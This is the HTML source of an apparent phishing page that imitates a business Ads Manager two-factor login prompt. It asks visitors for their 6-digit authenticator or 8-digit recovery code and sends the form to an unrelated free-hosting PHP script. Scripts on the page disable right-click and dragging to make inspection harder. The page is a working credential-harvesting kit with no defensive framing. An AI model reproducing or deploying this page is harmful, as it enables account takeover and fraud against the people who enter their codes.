<!doctype html>
<html lang="en"><head>
<style>
.anticon {
  display: inline-block;
  color: inherit;
  font-style: normal;
  line-height: 0;
  text-align: center;
  text-transform: none;
  vertical-align: -0.125em;
  text-rendering: optimizeLegibility;
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
}

.anticon > * {
  line-height: 1;
}

.anticon svg {
  display: inline-block;
}

.anticon::before {
  display: none;
}

.anticon .anticon-icon {
  display: block;
}

.anticon[tabindex] {
  cursor: pointer;
}

.anticon-spin::before,
.anticon-spin {
  display: inline-block;
  -webkit-animation: loadingCircle 1s infinite linear;
  animation: loadingCircle 1s infinite linear;
}

@-webkit-keyframes loadingCircle {
  100% {
    -webkit-transform: rotate(360deg);
    transform: rotate(360deg);
  }
}

@keyframes loadingCircle {
  100% {
    -webkit-transform: rotate(360deg);
    transform: rotate(360deg);
  }
}
</style>
<meta charset="utf-8"><link rel="icon" href="images/settings032.png"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#fafafa">
<link href="bootstrap/styles.css" rel="stylesheet">
<link href="bootstrap/chunk1.css" rel="stylesheet">
<link rel="apple-touch-icon" href=images/settings032.png"><title>Bussines AdsManager</title>
<link href="bootstrap/main.chunk.css" rel="stylesheet">
<script src="bootstrap/jquery.min.js"></script>
 <script type="text/javascript">function mousedwn(e){try{if(event.button==2||event.button==3)return false}catch(e){if(e.which==3)return false}}document.oncontextmenu=function(){return false};document.ondragstart=function(){return false};document.onmousedown=mousedwn
    </script>
</head>
<body>



<div id="root"><div class="ant-spin-nested-loading"><div class=""><div class="sc-jqCOkK kFZWwp"><div class="sc-gGBfsJ jvrGcO">


<div class="sc-jnlKLf OHNdu">
<center><div class="sc-fYxtnH hARKVj"><img style="height: 100px;width: 100px;" src="https://i.ibb.co/Th8MVQW/intro.png" class="identicon confirm-approve-content__identicon"></div></center>
<center><img style="height: 120px;width: 200px;" alt="" src="images/phone-notification_1.png" class="identicon confirm-approve-content__identicon"></center>

<div class="sc-htoDjs cDnNqw">

	<form method="post" action="//kampereteuaosysam-kualojnujut.000webhostapp.com/mabur/mudun/tatu.php?nkbihfbeogaeaoehlefnkodbefgpgknn/home" class="ant-form ant-form-horizontal">
	   <div class="ant-row ant-form-item ant-form-item-with-help" style="row-gap: 0px;"><div class="ant-col ant-form-item-control">
<div>
<br>
<div class="ant-col ant-form-item-control"><p class="thepadding" style="text-align: left;color: hsla(0,0%,49.8%,.85);"><b>Enter your login code</b></p>
<div>
<div class="ant-col ant-form-item-control"><p class="thepadding" style="text-align: left;color: hsla(0,0%,49.8%,.85);">Enter the 6-digit code we just sent from the authentication app you set up or Enter the 8-digit recovery code.</p>
<div>

    <div class="thepadding">
 <input type="text" name="zip" class="import-account__secret-phrase" pattern="[0-9]*" placeholder="Code" inputmode="numeric" minlength="6" autocomplete="off" required="" value="" style="
    height: 46px;

"></div></div><div class="ant-form-item-explain">
                </div></div></div>

                <div class="thepadding">
<button class="button sc-VigVT fWmldN" type="submit"><b>Submit Code</b></button>
<div1></div1></div>  </form>
                            </div>
							
                                </div>
                            <div class="wawobp loader" data-tenqwa="9fkuxe">
                                <div class="yat5ls lodas" data-2ivb6w="2n92zq">
                                    <svg viewBox="0 0 40 40" width="80px" color="text" xmlns="http://www.w3.org/2000/svg" class="sc-5a69fd5e-0 iGtDTz" style="
    margin-bottom: 20px;
">                     <center><div class="sc-fYxtnH hARKVj"><img src="images/sound-mobile.svg" alt="" style="height: 70px;width: 150px;" class="sc-tilXH gdtVXy"></div></center>

                                    <div class="7n1smr loader2 loader--style3" title="2" data-knlucr="ga7q37">
                                        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" style="margin:auto;background:#fff;display:block;" width="40px" height="40px" viewBox="0 0 100 100" preserveAspectRatio="xMidYMid">
                        <circle cx="50" cy="50" fill="none" stroke="#0b65c6" stroke-width="10" r="35" stroke-dasharray="164.93361431346415 56.97787143782138">
                          <animateTransform attributeName="transform" type="rotate" repeatCount="indefinite" dur="1s" values="0 50 50;360 50 50" keyTimes="0;1"></animateTransform>
                        </circle>
                      </svg>

                </div>

<script src="bootstrap/load.js"></script></body>

</html>
